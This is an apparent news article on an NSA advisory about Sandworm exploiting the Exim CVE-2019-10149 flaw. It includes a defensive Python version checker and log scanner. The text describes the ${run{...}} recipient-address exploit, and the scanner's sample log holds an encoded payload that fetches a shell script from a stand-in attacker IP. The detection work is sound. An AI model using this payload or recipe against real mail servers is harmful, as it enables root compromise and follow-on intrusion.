Hackers linked with Russian military intelligence are exploiting an Exim mail transfer agent bug to target US organisations, NSA warns

The group is known as "Sandworm" in the cyber security community

The US National Security Agency (NSA) has issued a cyber security advisory warning American organisations of a Russian hacking campaign exploiting a bug in commonly used email software to target private firms and organisations.

According to the NSA, the group behind these attacks operates within the GRU, Russia's military intelligence agency. It is known as "Sandworm" in the cyber security community and has been linked to the attacks on Ukraine's power grid in 2015 and 2016.

The NSA says these hackers have been exploiting a serious flaw in the Exim mail transfer agent (MTA), tracked as CVE-2019-10149, since at least August 2019. The bug, publicly disclosed in June 2019, affects Exim releases 4.87 through 4.91.

Exim is commonly found on Unix-like operating systems and is the default MTA on some Linux distributions, such as Debian.

Although a fix for CVE-2019-10149 has been available since Exim 4.92, many administrators have still not updated their servers.

A quick Shodan search shows about 2,481,000 internet-exposed Exim servers, of which over 2,467,000 already report the patched 4.93 release, leaving roughly 14,000 on older versions, some of which may still be vulnerable. Version banners do not reveal fixes that distributions backport without changing the version string, so such counts are only a rough upper bound.

To exploit the bug, an attacker only needs to send a specially crafted email: a recipient address whose local part contains an Exim string expansion such as ${run{...}} is evaluated by the vulnerable deliver_message() function, so the embedded command runs with root privileges on the mail server.

Once CVE-2019-10149 has been exploited, the victim's machine downloads a shell script from a Sandworm-controlled domain. The script attempts to disable network security settings, add privileged users, change SSH configurations and download further scripts to enable follow-on exploitation.

"Being able to gain root access to a bridge point into a network gives you so much ability and capability to read email, to navigate across and manoeuvre through the network," the NSA explains.

To mitigate the risk, the NSA recommends that system administrators patch their Exim servers by installing version 4.93 or newer, and that they check software versions regularly so updates are applied as new releases appear.

The NSA has also released indicators of compromise (IoCs) and instructions on how administrators can detect exploit attempts and unauthorised changes to their systems.
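As an added illustration (not code from the NSA advisory or from the Exim project), the following Python script performs the two checks the advisory asks administrators to make: it triages the version string printed by exim -bV against the affected range, and it scans a mail log for the ${run{...}} expansion the exploit depends on, decoding Exim's \xHH and \t escapes so the smuggled command can be read. The log lines, hostnames and IP addresses are constructed using documentation ranges and are not real indicators; the genuine IoCs are in the NSA's published list.

```python
import re

# Release range affected by CVE-2019-10149 in a default build (per the
# public disclosure): Exim 4.87 through 4.91. The fix shipped in 4.92;
# the NSA advisory asks for 4.93 or newer. Distribution packages may
# backport the fix without changing the version string, so treat a
# "vulnerable" result as "check the package changelog", not as proof.
AFFECTED_MIN = (4, 87)
AFFECTED_MAX = (4, 91)
NSA_RECOMMENDED = (4, 93)


def parse_exim_version(bv_output):
    """Pull (major, minor) out of `exim -bV` output, e.g.
    'Exim version 4.91 #1 built 10-Feb-2019 ...'."""
    m = re.search(r"Exim version (\d+)\.(\d+)", bv_output)
    if not m:
        raise ValueError("no 'Exim version X.Y' string found")
    return int(m.group(1)), int(m.group(2))


def classify_version(version):
    """Map a (major, minor) tuple to a triage label."""
    if version < AFFECTED_MIN:
        return "outdated"      # outside the default-vulnerable range, still far below 4.93
    if version <= AFFECTED_MAX:
        return "vulnerable"    # 4.87 .. 4.91: default build is exploitable
    if version < NSA_RECOMMENDED:
        return "patched"       # 4.92: this CVE is fixed, but below the NSA's 4.93 floor
    return "recommended"


# The exploit rides on Exim's own string-expansion syntax: a recipient
# local part such as ${run{...}} that the vulnerable deliver_message()
# expands. A local part cannot carry '/' or spaces, so payloads encode
# them with Exim's \xHH and \t escapes; we undo those to read the command.
RUN_ITEM = re.compile(r"\$\{run\b")
ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([tnr])")


def decode_exim_escapes(s):
    """Undo \\xHH and \\t \\n \\r escapes in an expansion payload."""
    def one(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return {"t": "\t", "n": "\n", "r": "\r"}[m.group(2)]
    return ESCAPE.sub(one, s)


def extract_expansion(text, start):
    """Return the brace-balanced ${...} item beginning at text[start] ('$')."""
    depth = 0
    for i in range(start + 1, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return text[start:]  # unterminated item: keep the rest of the line


def scan_log(log_text):
    """Report every ${run...} item in a log with its line number and decoded command."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for m in RUN_ITEM.finditer(line):
            item = extract_expansion(line, m.start())
            # strip the leading '${run{' and trailing '}}' to isolate the command text
            inner = item[len("${run{"):-2] if item.endswith("}}") else item
            hits.append({"line": lineno, "item": item,
                         "command": decode_exim_escapes(inner)})
    return hits


# Constructed sample (approximate Exim mainlog layout; RFC 5737 documentation
# addresses only, not real indicators): a normal arrival, a rejected RCPT
# carrying a ${run{...}} payload, and an ordinary local delivery.
SAMPLE_LOG = r"""2019-08-20 03:14:07 1i0aBc-0001xY-2Z <= bounce@example.net H=(mail.example.net) [198.51.100.23] P=esmtp S=1204 for alice@mail.example.org
2019-08-20 03:14:09 H=(x) [203.0.113.45] F=<> rejected RCPT <${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20http\x3A\x2F\x2F203.0.113.45\x2Fi.sh\x22}}@localhost>: Unrouteable address
2019-08-20 03:15:12 1i0aBd-0001xZ-4Q => bob <bob@mail.example.org> R=local_user T=local_delivery"""

if __name__ == "__main__":
    print(classify_version(parse_exim_version("Exim version 4.91 #1 built 10-Feb-2019")))
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['command']!r}")
```

On a real host, feed it the output of exim -bV and the contents of /var/log/exim4/mainlog and rejectlog (paths vary by distribution). A "vulnerable" verdict on a distribution-packaged Exim should be confirmed against the package changelog, since Debian and others shipped the CVE-2019-10149 fix under the old version number.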

Last year, Google's Threat Analysis Group (TAG) disclosed that it had sent more than 12,000 warnings in three months to users targeted by government-backed attackers, and described Sandworm's activity in the same report.

TAG researchers also said they had seen Sandworm targeting legitimate app developers in Ukraine with spear-phishing emails. In one such case, the attackers compromised a developer with a large number of apps published on the Play Store.